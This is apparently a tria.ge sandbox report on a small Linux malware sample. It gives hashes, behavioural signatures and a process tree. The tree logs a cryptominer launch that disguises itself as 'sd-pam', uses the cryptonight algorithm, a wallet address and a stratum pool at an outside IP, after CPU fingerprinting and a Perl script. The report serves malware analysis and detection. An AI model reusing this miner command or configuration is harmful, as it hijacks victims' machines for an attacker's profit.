Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
0s -
max time network
129s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240508-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240508-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
21/05/2024, 03:40
Static task
static1
Behavioral task
behavioral1
Sample
61ea017359a6dce4665a44a82f6feb9e_JaffaCakes118
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
61ea017359a6dce4665a44a82f6feb9e_JaffaCakes118
Resource
debian9-armhf-20240226-en
Behavioral task
behavioral3
Sample
61ea017359a6dce4665a44a82f6feb9e_JaffaCakes118
Resource
debian9-mipsbe-20240226-en
Behavioral task
behavioral4
Sample
61ea017359a6dce4665a44a82f6feb9e_JaffaCakes118
Resource
debian9-mipsel-20240226-en
General
-
Target
61ea017359a6dce4665a44a82f6feb9e_JaffaCakes118
-
Size
649B
-
MD5
61ea017359a6dce4665a44a82f6feb9e
-
SHA1
b4c777006847f9f690fd520782ce03cb4f047a41
-
SHA256
77d533c4a4865fc909174204dd0a957fa1b79b74ad02b0a72ec313db80261087
-
SHA512
af7be6f8671e01b5ae8dab6db0ac620eb6a5dcc526b8b50781b5737ed0bc0607f18f9cec414390358a22569cb5c011ca399d8a90129d7e9bf91b57ce39fd60cc
Malware Config
Signatures
-
Checks CPU configuration 1 TTPs 1 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo grep -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/bash.pid 61ea017359a6dce4665a44a82f6feb9e_JaffaCakes118
Processes
-
/tmp/61ea017359a6dce4665a44a82f6feb9e_JaffaCakes118/tmp/61ea017359a6dce4665a44a82f6feb9e_JaffaCakes1181⤵
- Writes file to tmp directory
PID:1504 -
/usr/bin/wcwc -l2⤵PID:1508
-
-
/usr/bin/sortsort -u2⤵PID:1507
-
-
/bin/grepgrep "^core id" /proc/cpuinfo2⤵
- Checks CPU configuration
PID:1506
-
-
/bin/unameuname -m2⤵PID:1509
-
-
/usr/bin/perlperl b.pl2⤵PID:1512
-
-
/tmp/h64./h64 -s sd-pam ./Word -a cryptonight -u 1QEVkXuQe8yN6PRHCQpxCfGQAFwTXBXxJj -o stratum+tcp://163.172.18.134:8080 -p "x:[email protected]" -k -B -l Word.txt "--donate-level=1"2⤵PID:1510
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5B
MD594f95cdbde2a1f83e642c708096500d0
SHA1a59ac422b60f8a6841bd649fe1f8fd5588dc6a9b
SHA256aef8505db2d1dea920d252288be2138f3cbbd4a72e1e29b08b875a7708288107
SHA512e17531c92c55c2ef939a8ed8e3a573f50583326ba86bd4b3c65150b4ecfb66b3ed2ba489e60f7bbe4af0d3a057075ad1952acdb93482975167a6682096a4b699